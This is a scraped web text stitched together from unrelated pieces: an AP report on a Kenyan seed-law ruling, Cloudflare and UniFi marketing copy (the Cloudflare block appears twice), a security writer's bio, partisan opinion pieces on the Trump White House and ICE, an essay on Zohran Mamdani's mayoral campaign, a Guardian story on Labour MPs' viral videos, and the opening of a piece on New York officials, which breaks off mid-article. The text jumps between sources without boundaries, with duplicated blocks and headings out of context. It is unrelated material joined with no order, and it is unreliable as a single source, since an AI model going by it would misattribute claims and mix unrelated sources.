Feel free to tell what you plan on doing this weekend and even ask for help or feedback.
Please keep in mind it’s more than OK to do nothing at all too!...
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Kenyan court declares law banning seed sharing unconstitutional
KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from
sharing and selling indigenous seeds
in what food campaigners have called a landmark win for food security.
Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenya shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.
Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.
The law was introduced as a measure to curb growing sale of counterfeit seeds that were causing loses in the agricultural sector and gave sole seed trading rights to licensed companies.
The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.
A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.
“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.
Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”
“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.
Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.
Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.
Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.
The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.
Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.
Connect your people, apps and AI agents
Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.
Protect and accelerate websites and AI-enabled apps
Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.
Related
Build and secure AI agents
Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.
Related
One global cloud network
unlike any other
Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.
60+
cloud services available globally
234B
cyber threats blocked each day
20%
of all websites are protected by Cloudflare
330+
cities in 125+ countries, including mainland China
Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.
Connect your people, apps and AI agents
Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.
Protect and accelerate websites and AI-enabled apps
Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.
Related
Build and secure AI agents
Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.
Related
One global cloud network
unlike any other
Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.
60+
cloud services available globally
234B
cyber threats blocked each day
20%
of all websites are protected by Cloudflare
330+
cities in 125+ countries, including mainland China
I am a
public-interest technologist
, working at the intersection of security, technology, and people. I've been writing about security issues on my
blog
since 2004, and in my monthly
newsletter
since 1998. I'm a fellow and lecturer at Harvard's
Kennedy School
, a board member of
EFF
, and the Chief of Security Architecture at
Inrupt, Inc.
This personal website expresses the opinions of none of those organizations.
The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.
UniFi 5G Max: Simple Setup and Clean Design
The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready to use WAN interface, no matter whether plugged directly into your UniFi gateway or into your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.
Automatic adoption as a UniFi WAN interface on any PoE port.
Compact indoor design with a handy LCM
Desk, wall, or window mounting options
Optimize signal reception by repositioning anywhere on the network.
Ideal for home, office, or remote site use.
A compact form factor designed for fast installation and flexible placement at the core or edge.
Ultra-Flexible Connectivity for Any Network Role
The 5G Max delivers downlink speeds up to 2 Gbps with ultra low latency that makes it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.
Up to 2 Gbps downlink
Ultra low latency on supported networks
Works as primary, load-balanced, or failover WAN
Customizable policy based routing
SLA driven control through UniFi
High speed 5G that adapts to your network's rules, not the other way around.
UniFi 5G Max Outdoor: Rugged Speed and Extended Reach
For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high performance cellular connectivity with improved antenna performance in a durable IP67 rated enclosure. It is built for rooftop installs, off site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can also connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.
Enhanced long range antenna design
IP67 weather resistant construction
Built for rooftops, remote sites, and vehicle based setups
Stable performance in harsh conditions
A weatherproof 5G device built for reliability wherever you place it.
Dream Router 5G Max: The Fully Integrated UniFi Experience
If you want everything UniFi in one device, the DreamRouter 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance and scalable network stack instantly.
Integrated tri-band WiFi 7
Local storage via MicroSD for UniFi apps
Full UniFi OS environment
Complete routing and management in one device
Perfect for remote offices and flexible deployments
A complete UniFi system powered by the reach and speed of 5G.
Fully Unlocked for Maximum Carrier Flexibility
Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.
Unlocked hardware for all major carriers
Supports physical SIM and eSIM
Fast activation and easy carrier changes
Consistent performance across service providers
Carrier freedom built directly into the hardware from day 1.
The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.
Latest Articles
Sabrina Carpenter and the Cruel Authoritarianism of Trump
Portside
portside.org
2025-12-05 06:21:13
Sabrina Carpenter and the Cruel Authoritarianism of Trump
jay
Fri, 12/05/2025 - 01:21
...
The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.
They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.
They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”
That’s not just ugly: it’s a warning.
Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.
This is what rising authoritarianism looks like in the age of social media.
A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.
But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?
We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.
Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?
Those questions disappear when the government turns an ICE arrest into a meme.
There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.
It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.
That’s how they get permission — both explicit and implicit — for abuses.
If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.
Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.
That is exactly why authoritarians always start by dehumanizing a target group.
And it always spreads.
Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.
Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”
All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.
This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”
That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.
And that’s the Trump regime’s first goal.
Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.
With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Lawrence Reese, noted in his book
The Nazi Mind: 12 Warnings From History
), culture war isn’t a sideshow anymore, it’s part of a larger strategy.
When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.
And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.
Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.
If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.
Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.
So what do we do?
First
, stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them without context (no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.
Second
, demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.
Third
, support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.
Fourth
, get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism: Don’t give them either: participate.
And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.
When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of
all
the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.
If we let this become normal, we will — one day soon — no longer recognize our country.
This is the moment to draw a line.
Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.
Call. Organize. Vote. Let’s not let cruelty become America’s official language.
When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in
Burnout
, Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.
We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book
The Decline of Popular Politics
with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel
has described
the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.
This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”
Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.
Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a
different perspective
: “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”
The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “
Commie Corridor
” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a
New Yorker
tote bag can be found.
When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.
Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange
has shown
, the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.
Not By Bread-and-Butter Alone
Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.
Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March.
A video of the encounter
, in which Mamdani challenged Homan over the illegal detention of Palestinian solidarity activist Mahmoud Khalil, circulated widely on social media and in immigrant communities. All of this helped Mamdani link his economic program with opposition to the president’s authoritarian lurch. In doing so, he appealed to immigrant voters worried about both ICE raids and making the rent, as well as voters who want their representatives to stand up to masked federal agents snatching people off the streets and whisking them away in unmarked cars. Moreover, Mamdani’s identity as a Muslim of South Asian descent undoubtedly activated demobilized voters excited by the idea of seeing someone like them in Gracie Mansion. The historic turnout surge that swept Muslim and South Asian neighborhoods in the outer boroughs is inseparable from Mamdani’s faith, his cultural fluency, and his outspoken defense of fellow Muslims against the Cuomo campaign’s Islamophobic bigotry.
The New York City chapter of the Democratic Socialists of America (NYC-DSA) has received a lot of credit for Mamdani’s victory, and rightfully so. Mamdani is a DSA member, as are his chief of staff, field director, and other key advisers. The campaign’s field leads, who organized canvassing shifts, were disproportionately members (I co-led a weekly canvass in my Brooklyn neighborhood during the primary). But organizations rooted in South Asian and Muslim communities deserve their fair share of the credit, including Desis Rising Up and Moving (DRUM) Beats, the Muslim Democratic Club of New York, Bangladeshi Americans for Political Progress, and grassroots affinity groups like Pakistanis for Zohran and Bangladeshis for Zohran. The mobilization of these communities transformed the electorate and helped Mamdani offset Cuomo’s strength in neighborhoods that shifted sharply to the former governor in the general election.
There are nearly 1 million Muslims in New York, but until Mamdani’s campaign they were a sleeping giant in local politics. Roughly 350,000 Muslims were registered, but only 12 percent of registered Muslims turned out to vote in the 2021 mayoral election. Mamdani’s campaign turned this dynamic completely on its head. DRUM Beats, which has organizing bases in the Bronx, Brooklyn, and Queens spanning a range of South Asian and Indo-Caribbean diasporic communities, played a key role. Their organizers are committed and tenacious, and many of them are women. “We’re like a gang,” the group’s organizing director Kazi Fouzia
told a
Politico
reporter
last summer. “When we go to any shop, people just move aside and say, ‘Oh my god. The DRUM leaders are here. The DRUM women are here.’” When Mamdani recognized “every New Yorker in Kensington and Midwood” in his victory speech, he had in mind the scores of aunties who ran themselves ragged knocking doors, sending texts, and making phone calls.
In their
post-election analysis
of the voting data, DRUM Beats detailed an enormous increase in turnout in the communities they organize. Based on Board of Elections data and their own models, they estimated that from 2021 to 2025 South Asian turnout exploded from 15.3 percent to nearly 43 percent, while Muslim turnout went from barely 15 percent to over 34 percent. While representing just 7 percent of New York’s registered voters, they accounted for an estimated 15 percent of actual voters in the general election. Nearly half of the city’s registered Bangladeshi and Pakistani American voters participated in the election, outpacing the overall participation rate of roughly 42 percent. This historic development didn’t materialize out of thin air. Mamdani’s faith, identity, and raw talent certainly didn’t hurt, but people on the ground have been quietly building civic infrastructure in these neighborhoods. In his assessment of the South Asian surge, electoral strategist Waleed Shahid noted that the places with the biggest gains were precisely “the places where DRUM Beats and allied organizers have spent years knocking doors, translating ballot measures, convening tenant meetings in basement prayer rooms, and building lists through WhatsApp groups and WhatsApp rumors alike.” I had the good fortune of getting to know some of these organizers during the campaign. Their capacity to mobilize working-class immigrants who had been overlooked for too long is formidable, and Mamdani’s victory cannot be explained without it.
Mamdani claimed the legacy of Fiorello La Guardia and Vito Marcantonio in the campaign’s final days, and the historical resonances ran deep. Shahid drew a parallel between the current moment and earlier realignments in the city’s political history “when groups written off as threatening or foreign became disciplined voting blocs: Irish Catholics moving from despised outsiders to Tammany’s core; Jewish and Italian workers turning the Lower East Side into a labor/socialist stronghold.” I am a product of New York’s twentieth-century Italian American diaspora myself. In rooms full of South Asian aunties for Zohran, wearing headscarves and plying everyone with plates of food, I saw people who in a different time could have been my own relatives stumping for the Little Flower, the legendary figure who was once told New York wasn’t ready for an Italian mayor. Turns out it was ready for an Italian mayor then, and it’s ready for a Muslim mayor now.
A Test for Partyism
Donald Trump’s return to the presidency set off a war of white papers on Democratic Party electoral strategy that shows few signs of a ceasefire. There are a variety of strategic prescriptions, but many of them fall into two broad and infelicitously named camps: popularists and deliverists. Popularists tend to hail from the party’s moderate wing, but not always. There is a leftist variety of popularism, for example, that finds expression in projects like the Center for Working-Class Politics. Ezra Klein has offered perhaps the clearest definition of the popularist persuasion: “Democrats should do a lot of polling to figure out which of their views are popular and which are not popular, and then they should talk about the popular stuff and shut up about the unpopular stuff.” Deliverism, by contrast, focuses less on campaigning and more on governing. As Matt Stoller summarized it in a tweet: “deliver and it helps you win elections. Don’t deliver and you lose.” When Democrats are in power, they should implement bold policies that improve people’s lives and then reap the rewards from a satisfied electorate.
There is an element of “duh, of course” to both schools of thought, but the weaknesses are easy to spot. Popularism seeks to mirror the current state of public opinion for the sake of electoral success, but public opinion is malleable and sometimes quite fickle. One need only look at the wildly fluctuating data on immigration attitudes since the 2024 election to see how quickly chasing public opinion can become a fool’s errand. Deliverism, by contrast, presumes “a linear and direct relationship between economic policy and people’s political allegiances,” as Deepak Bhargava, Shahrzad Shams, and Harry Hanbury
put it
. But that’s not typically how real people operate. The Biden administration was, in many respects, an experiment in deliverism that failed to deliver. It implemented policies that brought tangible benefits to millions of people but still couldn’t prevent Trump from returning to the White House.
The limitations of both popularism and deliverism have opened space for a new school of thought, one that tackles strategic electoral questions from a different angle (but also has a terrible name): partyism. The political scientist Henry Farrell has
usefully summarized
its premises: the Democratic Party’s fundamental problem is not its ideological positioning but the fact that it’s not a political party in any real sense. “If Democrats want to succeed,” Farrell writes, they need to “build up the Democratic party as a coherent organization that connects leaders to ordinary people.” In their book
The Hollow Parties
, Daniel Schlozman and Sam Rosenfeld trace how the Democratic and Republican parties alike have been transformed into rival “blobs” of consultants, donors, strategists, and interest groups. Their critique has been influential, and it has informed a spate of proposals for turning the Democratic Party into a network of civic institutions that engages voters between elections and mediates effectively between leaders and the base.
The Mamdani campaign was arguably the first major test of the partyist approach in practice. While there is no indication that campaign leaders and strategists consciously appropriated these ideas, it is not difficult to see the affinities between them. The campaign brought new and disengaged voters into the fold through novel activities like the scavenger hunt and the Cost of Living Classic, a citywide soccer tournament held in Coney Island. Its sinew and muscle came not from TikTok or Instagram, but rooted civic organizations like NYC-DSA, DRUM Beats, United Auto Workers Region 9A, and the mosques, synagogues, and churches that opened their doors to the candidate. Even four of the five Democratic Party county committees in the city endorsed him, despite their historic wariness of insurgent candidates from the democratic socialist left (only the Queens county committee, a stronghold of dead-end Cuomo supporters, snubbed him). Mamdani’s victory was based, to a significant extent, on organizations with real members who engage in meaningful civic and political activity.
Of all the organizations listed above, however, the least important by far are the official bodies of the Democratic Party. The Mamdani campaign may have embodied an emergent partyist politics, but this is a partyism without the party. NYC-DSA’s electoral strategy, for example, is grounded in the concept of the “party surrogate” first proposed by
Jacobin
’s Seth Ackerman and developed further by the political scientist Adam Hilton and others. Given the daunting odds of successfully establishing any new party,
Hilton proposes
a network of chapter-based organizations “oriented toward building a base within working-class communities and labor unions that can also act as an effective independent pressure group on the Democratic Party.” This is precisely what Mamdani and other socialist candidates have done. Primary voters—not party organizations—decide candidate nominations, which radically reduces the incentives for transforming those organizations. Why fill in the hollow parties when you can do much the same thing outside of them?
For now, at least, partyist projects like the one that catapulted Mamdani into political stardom will continue to gestate outside of any formal party organization. The NYC-DSA chapter has doubled in size to 13,000 members since 2024, and that number will likely continue to grow. Organizers have established a new organization called Our Time that is focused on mobilizing campaign volunteers in support of Mamdani’s agenda after he is sworn into office. NYC-DSA, DRUM Beats, labor unions, tenant groups, and other organizations that endorsed Mamdani during the campaign have established a formal coalition called the People’s Majority Alliance to do much the same thing at the organizational leadership level. So it seems unlikely that Mamdani’s coalition will demobilize the way Barack Obama’s did after 2008. These are independent organizations, constituted outside of official Democratic Party institutions, that assume the base-building and mobilization functions a party would carry out directly in most other political systems. This is the form popular and participatory politics takes in the age of hollow parties, raising the possibility that a lost culture once sustained by precinct captains, ward heelers, and saloon keepers could be reborn in a new way.
Rolling back MAGA will require speaking to popular needs and aspirations and delivering on them. It will also require developing our capacities to work together in a spirit of democratic cooperation and public exuberance. The Mamdani campaign laid the foundations for this in one city, but here and elsewhere much more reconstruction remains to be done.
[
Chris Maisano
is a trade unionist and Democratic Socialists of America activist. He lives in Brooklyn, New York.]
TIL: Subtests in pytest 9.0.0+
Simon Willison
simonwillison.net
2025-12-05 06:03:29
TIL: Subtests in pytest 9.0.0+
I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests.
I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful...
Explaining UK debt with biscuits: Labour MPs get the hang of viral content
Guardian
www.theguardian.com
2025-12-05 06:00:40
Gordon McKee, whose explainer has racked up 3m views, leads way as party tries to harness power of social mediaUK politics live – latest updatesA perennial head-scratcher for progressives is how to craft a simple, compelling message on the economy. One Labour MP found the answer in a few packets of ...
A perennial head-scratcher for progressives is how to craft a simple, compelling message on the economy. One
Labour
MP found the answer in a few packets of M&S biscuits.
Gordon McKee, who represents Glasgow South, has
racked up more than 3.3m views on X
with an 101-second video in which he demonstrates the UK’s debt to GDP ratio using stacks of custard creams and chocolate bourbons.
It may not seem like a major feat when several of the world’s most impactful politicians – Donald Trump, Nigel Farage and Zohran Mamdani among them – have used sleekly produced short-form videos to spread their campaign messages with considerable success.
But in the parliamentary Labour party McKee is a pioneer, and the only backbencher known to have hired a digital content creator.
The decision has paid off, with a series of professional-grade videos using grabby analogies designed to go viral. In recent weeks a few of his colleagues have began to emulate him, including the Leeds East MP Richard Burgon.
“I feel like I should apologise for having started this!” McKee joked – before arguing that digital comms and campaigning was now essential for politicians.
He said he aimed to produce a couple of such videos a week and was focused on
Instagram
, TikTok and YouTube Shorts, which unlike X reach audiences beyond the politically hyper-engaged.
“I spoke at a high school in my constituency last week and I asked how many people read a newspaper every day – one put their hand up. When I asked how many are on Instagram, they all did,” he said.
“The way people consume information has changed enormously in the last 10 years but the way politicians and MPs communicate with their constituents hasn’t as much.”
There are signs that the Labour party machine is cranking into gear. Keir Starmer emailed Labour MPs on 21 November announcing a “significant investment” from the party in “new comprehensive training programme” in digital campaigning.
Internally, the party has unveiled what it calls “Operation Second Term” to modernise its campaign operation – using social media and an app called Labour One – on the basis that “the way we campaigned in 2024 won’t be how we win again in 2029”.
MPs are also increasingly taking the initiative. Burgon used 200 packets of Sainsbury’s fusilli
to demonstrate
just how much £1bn is compared with the average UK salary of £33,000. His video has garnered nearly 650,000 views on X.
“I was going around the church fairs in the constituency this weekend – it was amazing how many people had seen the video,” Burgon said. “I’ve been campaigning for a wealth tax for a while and it seemed a fun way of communicating that.”
The 106kg mountain of pasta, which Burgon’s parliamentary researcher bought the weekend before last, could not feasibly be transported to Leeds and so has been donated to food banks in London.
Jeevun Sandher, the MP for Loughborough and an economist,
made a James Bond-themed video during budget week
explaining the various factors that affect government bond rates. “I’d love it if people read my 2,000-word essays but they don’t. You have to find a way of being engaging,” he said.
He relies on his existing team of parliamentary staffers – armed with a smartphone and ring-light mounted on to a tripod in the corner of his office – to produce online content.
Social media
planning is part of his office’s regular weekly catchup meeting.
Asked whether the government should be doing more to encourage MPs to modernise their communication, Sandher thinks that would risk becoming too regimented.
“It works quite well when it’s more organic and people understand what the government’s message is and take it on in different ways,” he said. “When you have a unified vision, everyone should be able to read off that script.”
Several junior ministers are also experimenting with social media, including the Treasury exchequer secretary, Dan Tomlinson, who filmed a chatty pre-budget clip on his way to Gregg’s for a doughnut at
Westminster tube station
, and the AI minister Kanishka Narayan who
shot a video on his iPhone
about the technology’s growth in the UK.
Some of the cabinet are also getting involved – Steve Reed, the housing secretary, did an “ask me anything” session on Reddit about a policy to reopen local pubs in September, and Ed Miliband, the energy secretary, who is a longtime vertical video enthusiast,
used ASMR to promote a government announcement
on small modular reactors (SMR).
“During the general election we had a big old team to support people doing this stuff and now they’re having to do that within their own offices,” said a Labour source. “It’s harder when you’re not attacking and instead having to defend and make a positive story about something, which is why you’ve got to be even more creative. It’s a difficult skill to learn but it’s an absolutely essential one.”
McKee argued that the challenge was especially acute for the left because rightwingers such as Farage and Robert Jenrick, the shadow justice secretary, are skilful at communicating very clear and simple stories on and off social media.
“The task from progressives is to articulate a complex argument that is realistic and ambitious but also real and deliverable – and to do that in an interesting, engaging way,” he said.
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation
Portside
portside.org
2025-12-05 05:37:41
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation
jay
Fri, 12/05/2025 - 00:37
...
Jackie Bray has been thinking about how quickly things could spiral out of control.
Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?
It’s a problem only made more acute by how geared some of the operations have been towards gaining as much attention as possible, and by their direction away from immigration enforcement, and towards repressing protests in response.
The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.
Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch
reportedly
got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police
placed barricades
between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.
